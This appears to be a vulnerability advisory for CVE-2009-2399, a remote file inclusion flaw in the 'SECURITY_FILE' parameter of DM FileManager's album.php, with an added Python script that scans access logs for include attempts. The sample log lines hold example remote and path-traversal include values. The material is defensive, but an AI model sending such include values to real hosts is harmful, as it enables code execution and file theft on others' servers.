Summary
The host is running DM FileManager and is prone to a remote file inclusion vulnerability.
Impact
Successful exploitation lets a remote attacker execute arbitrary PHP code and include arbitrary files from local or external resources when register_globals is enabled.
Impact Level: Application
Solution
Apply the security patch from the link below:
http://www.dutchmonkey.com/?file=products/dm-albums/download_form.html
Insight
The error exists because input passed to the 'SECURITY_FILE' parameter of 'album.php' in the 'dm-albums/template/' directory is not properly verified before being used to include files.
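To check whether a host has already received requests of this kind, the following sketch scans web server access-log lines for requests that set 'SECURITY_FILE' on 'album.php'. It is an added example, not part of the original advisory or of DutchMonkey's code; the log format, the sample lines, and the function names `classify` and `scan` are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path and parameter name are the ones named in the advisory.
SCRIPT_SUFFIX = "/dm-albums/template/album.php"
PARAM = "SECURITY_FILE"

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

def classify(value):
    """Label a request-supplied SECURITY_FILE value (hypothetical labels)."""
    v = unquote(value)  # second decode catches double-encoded values
    if SCHEME_RE.match(v):
        return "remote-include"
    if "../" in v or "..\\" in v or v.startswith("/"):
        return "local-include"
    return "parameter-set"  # assumption: any client-supplied value merits review

def scan(lines):
    """Return (line_no, client, label) for requests that set PARAM on album.php."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # Decode, normalise and lowercase the path so encoded or mixed-case
        # spellings of the script name still match.
        path = posixpath.normpath(unquote(parts.path)).lower()
        if not path.endswith(SCRIPT_SUFFIX):
            continue
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key == PARAM:  # PHP variable names are case-sensitive
                findings.append((n, line.split()[0], classify(value)))
    return findings

# Constructed sample lines (combined log format); not taken from a real host.
SAMPLE = [
    '203.0.113.5 - - [10/Jul/2009:10:00:01 +0000] "GET /dm-albums/template/album.php?SECURITY_FILE=http://example.invalid/a.txt HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Jul/2009:10:00:02 +0000] "GET /DM-Albums/template/album.php?SECURITY%5FFILE=..%2F..%2Fnotes.txt HTTP/1.1" 200 300',
    '198.51.100.7 - - [10/Jul/2009:10:00:03 +0000] "GET /dm-albums/template/album.php?album=holiday HTTP/1.1" 200 2048',
    '198.51.100.8 - - [10/Jul/2009:10:00:04 +0000] "GET /index.php?SECURITY_FILE=x HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Access logs record only the query string; with register_globals enabled the same variable can also arrive in a POST body or a cookie, so an empty result does not rule out earlier attempts.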
Affected
DutchMonkey, DM FileManager version 3.9.4 and prior
References
Updated on 2017-03-28
Severity
Classification
- CVE: CVE-2009-2399
CVSS Base Score: 6.8
AV:N/AC:M/Au:N/C:P/I:P/A:P
Related Vulnerabilities
- 2532|Gigs Directory Traversal And SQL Injection Multiple Vulnerabilities
- 1024 CMS 1.1.0 Beta 'force_download.php' Local File Include Vulnerability
- Advanced Image Hosting Cross Site Scripting Vulnerability
- Aker Secure Mail Gateway Cross-Site Scripting Vulnerability
- Adobe ColdFusion Unspecified Information Disclosure Vulnerability